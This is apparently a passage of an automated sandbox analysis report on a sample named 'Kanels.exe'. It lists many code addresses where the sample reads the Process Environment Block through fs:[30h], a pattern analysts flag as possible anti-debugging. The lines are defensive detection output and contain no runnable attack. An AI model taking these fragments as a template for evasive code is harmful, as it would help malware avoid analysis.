Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA2C3 mov eax, dword ptr fs:[00000030h] 7_2_22CDA2C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA2C3 mov eax, dword ptr fs:[00000030h] 7_2_22CDA2C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA2C3 mov eax, dword ptr fs:[00000030h] 7_2_22CDA2C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA2C3 mov eax, dword ptr fs:[00000030h] 7_2_22CDA2C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02E1 mov eax, dword ptr fs:[00000030h] 7_2_22CE02E1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02E1 mov eax, dword ptr fs:[00000030h] 7_2_22CE02E1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02E1 mov eax, dword ptr fs:[00000030h] 7_2_22CE02E1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E284 mov eax, dword ptr fs:[00000030h] 7_2_22D0E284
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E284 mov eax, dword ptr fs:[00000030h] 7_2_22D0E284
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D50283 mov eax, dword ptr fs:[00000030h] 7_2_22D50283
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D50283 mov eax, dword ptr fs:[00000030h] 7_2_22D50283
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D50283 mov eax, dword ptr fs:[00000030h] 7_2_22D50283
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE02A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE02A0 mov eax, dword ptr fs:[00000030h] 7_2_22CE02A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov eax, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov ecx, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov eax, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov eax, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov eax, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D662A0 mov eax, dword ptr fs:[00000030h] 7_2_22D662A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA625D mov eax, dword ptr fs:[00000030h] 7_2_22DA625D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A250 mov eax, dword ptr fs:[00000030h] 7_2_22D8A250
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A250 mov eax, dword ptr fs:[00000030h] 7_2_22D8A250
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6259 mov eax, dword ptr fs:[00000030h] 7_2_22CD6259
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D58243 mov eax, dword ptr fs:[00000030h] 7_2_22D58243
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D58243 mov ecx, dword ptr fs:[00000030h] 7_2_22D58243
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA250 mov eax, dword ptr fs:[00000030h] 7_2_22CCA250
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC826B mov eax, dword ptr fs:[00000030h] 7_2_22CC826B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D80274 mov eax, dword ptr fs:[00000030h] 7_2_22D80274
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4260 mov eax, dword ptr fs:[00000030h] 7_2_22CD4260
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4260 mov eax, dword ptr fs:[00000030h] 7_2_22CD4260
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4260 mov eax, dword ptr fs:[00000030h] 7_2_22CD4260
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC823B mov eax, dword ptr fs:[00000030h] 7_2_22CC823B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D743D4 mov eax, dword ptr fs:[00000030h] 7_2_22D743D4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D743D4 mov eax, dword ptr fs:[00000030h] 7_2_22D743D4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E3DB mov eax, dword ptr fs:[00000030h] 7_2_22D7E3DB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E3DB mov eax, dword ptr fs:[00000030h] 7_2_22D7E3DB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E3DB mov ecx, dword ptr fs:[00000030h] 7_2_22D7E3DB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E3DB mov eax, dword ptr fs:[00000030h] 7_2_22D7E3DB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA3C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDA3C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD83C0 mov eax, dword ptr fs:[00000030h] 7_2_22CD83C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD83C0 mov eax, dword ptr fs:[00000030h] 7_2_22CD83C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD83C0 mov eax, dword ptr fs:[00000030h] 7_2_22CD83C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD83C0 mov eax, dword ptr fs:[00000030h] 7_2_22CD83C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8C3CD mov eax, dword ptr fs:[00000030h] 7_2_22D8C3CD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D563C0 mov eax, dword ptr fs:[00000030h] 7_2_22D563C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE03E9 mov eax, dword ptr fs:[00000030h] 7_2_22CE03E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D063FF mov eax, dword ptr fs:[00000030h] 7_2_22D063FF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE3F0 mov eax, dword ptr fs:[00000030h] 7_2_22CEE3F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE3F0 mov eax, dword ptr fs:[00000030h] 7_2_22CEE3F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE3F0 mov eax, dword ptr fs:[00000030h] 7_2_22CEE3F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF438F mov eax, dword ptr fs:[00000030h] 7_2_22CF438F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF438F mov eax, dword ptr fs:[00000030h] 7_2_22CF438F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE388 mov eax, dword ptr fs:[00000030h] 7_2_22CCE388
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE388 mov eax, dword ptr fs:[00000030h] 7_2_22CCE388
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE388 mov eax, dword ptr fs:[00000030h] 7_2_22CCE388
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC8397 mov eax, dword ptr fs:[00000030h] 7_2_22CC8397
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC8397 mov eax, dword ptr fs:[00000030h] 7_2_22CC8397
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC8397 mov eax, dword ptr fs:[00000030h] 7_2_22CC8397
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D78350 mov ecx, dword ptr fs:[00000030h] 7_2_22D78350
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov eax, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov eax, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov eax, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov ecx, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov eax, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5035C mov eax, dword ptr fs:[00000030h] 7_2_22D5035C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9A352 mov eax, dword ptr fs:[00000030h] 7_2_22D9A352
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA634F mov eax, dword ptr fs:[00000030h] 7_2_22DA634F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D52349 mov eax, dword ptr fs:[00000030h] 7_2_22D52349
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7437C mov eax, dword ptr fs:[00000030h] 7_2_22D7437C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A30B mov eax, dword ptr fs:[00000030h] 7_2_22D0A30B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A30B mov eax, dword ptr fs:[00000030h] 7_2_22D0A30B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A30B mov eax, dword ptr fs:[00000030h] 7_2_22D0A30B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC310 mov ecx, dword ptr fs:[00000030h] 7_2_22CCC310
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF0310 mov ecx, dword ptr fs:[00000030h] 7_2_22CF0310
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA8324 mov eax, dword ptr fs:[00000030h] 7_2_22DA8324
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA8324 mov ecx, dword ptr fs:[00000030h] 7_2_22DA8324
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA8324 mov eax, dword ptr fs:[00000030h] 7_2_22DA8324
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA8324 mov eax, dword ptr fs:[00000030h] 7_2_22DA8324
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D520DE mov eax, dword ptr fs:[00000030h] 7_2_22D520DE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D120F0 mov ecx, dword ptr fs:[00000030h] 7_2_22D120F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD80E9 mov eax, dword ptr fs:[00000030h] 7_2_22CD80E9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA0E3 mov ecx, dword ptr fs:[00000030h] 7_2_22CCA0E3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D560E0 mov eax, dword ptr fs:[00000030h] 7_2_22D560E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC0F0 mov eax, dword ptr fs:[00000030h] 7_2_22CCC0F0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD208A mov eax, dword ptr fs:[00000030h] 7_2_22CD208A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D960B8 mov eax, dword ptr fs:[00000030h] 7_2_22D960B8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D960B8 mov ecx, dword ptr fs:[00000030h] 7_2_22D960B8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC80A0 mov eax, dword ptr fs:[00000030h] 7_2_22CC80A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D680A8 mov eax, dword ptr fs:[00000030h] 7_2_22D680A8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56050 mov eax, dword ptr fs:[00000030h] 7_2_22D56050
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2050 mov eax, dword ptr fs:[00000030h] 7_2_22CD2050
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFC073 mov eax, dword ptr fs:[00000030h] 7_2_22CFC073
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D54000 mov ecx, dword ptr fs:[00000030h] 7_2_22D54000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D72000 mov eax, dword ptr fs:[00000030h] 7_2_22D72000
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE016 mov eax, dword ptr fs:[00000030h] 7_2_22CEE016
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE016 mov eax, dword ptr fs:[00000030h] 7_2_22CEE016
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE016 mov eax, dword ptr fs:[00000030h] 7_2_22CEE016
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE016 mov eax, dword ptr fs:[00000030h] 7_2_22CEE016
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66030 mov eax, dword ptr fs:[00000030h] 7_2_22D66030
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA020 mov eax, dword ptr fs:[00000030h] 7_2_22CCA020
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC020 mov eax, dword ptr fs:[00000030h] 7_2_22CCC020
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov ecx, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_22D4E1D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D961C3 mov eax, dword ptr fs:[00000030h] 7_2_22D961C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D961C3 mov eax, dword ptr fs:[00000030h] 7_2_22D961C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D001F8 mov eax, dword ptr fs:[00000030h] 7_2_22D001F8
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA61E5 mov eax, dword ptr fs:[00000030h] 7_2_22DA61E5
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5019F mov eax, dword ptr fs:[00000030h] 7_2_22D5019F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5019F mov eax, dword ptr fs:[00000030h] 7_2_22D5019F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5019F mov eax, dword ptr fs:[00000030h] 7_2_22D5019F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5019F mov eax, dword ptr fs:[00000030h] 7_2_22D5019F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8C188 mov eax, dword ptr fs:[00000030h] 7_2_22D8C188
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8C188 mov eax, dword ptr fs:[00000030h] 7_2_22D8C188
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D10185 mov eax, dword ptr fs:[00000030h] 7_2_22D10185
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74180 mov eax, dword ptr fs:[00000030h] 7_2_22D74180
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D74180 mov eax, dword ptr fs:[00000030h] 7_2_22D74180
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA197 mov eax, dword ptr fs:[00000030h] 7_2_22CCA197
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA197 mov eax, dword ptr fs:[00000030h] 7_2_22CCA197
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCA197 mov eax, dword ptr fs:[00000030h] 7_2_22CCA197
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D68158 mov eax, dword ptr fs:[00000030h] 7_2_22D68158
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov eax, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov eax, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov ecx, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov eax, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D64144 mov eax, dword ptr fs:[00000030h] 7_2_22D64144
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6154 mov eax, dword ptr fs:[00000030h] 7_2_22CD6154
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6154 mov eax, dword ptr fs:[00000030h] 7_2_22CD6154
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC156 mov eax, dword ptr fs:[00000030h] 7_2_22CCC156
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4164 mov eax, dword ptr fs:[00000030h] 7_2_22DA4164
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4164 mov eax, dword ptr fs:[00000030h] 7_2_22DA4164
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D90115 mov eax, dword ptr fs:[00000030h] 7_2_22D90115
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 mov ecx, dword ptr fs:[00000030h] 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 mov eax, dword ptr fs:[00000030h] 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 mov eax, dword ptr fs:[00000030h] 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7A118 mov eax, dword ptr fs:[00000030h] 7_2_22D7A118
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov ecx, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov ecx, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov ecx, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov eax, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7E10E mov ecx, dword ptr fs:[00000030h] 7_2_22D7E10E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00124 mov eax, dword ptr fs:[00000030h] 7_2_22D00124
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A6C7 mov ebx, dword ptr fs:[00000030h] 7_2_22D0A6C7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A6C7 mov eax, dword ptr fs:[00000030h] 7_2_22D0A6C7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D506F1 mov eax, dword ptr fs:[00000030h] 7_2_22D506F1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D506F1 mov eax, dword ptr fs:[00000030h] 7_2_22D506F1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_22D4E6F2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_22D4E6F2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_22D4E6F2
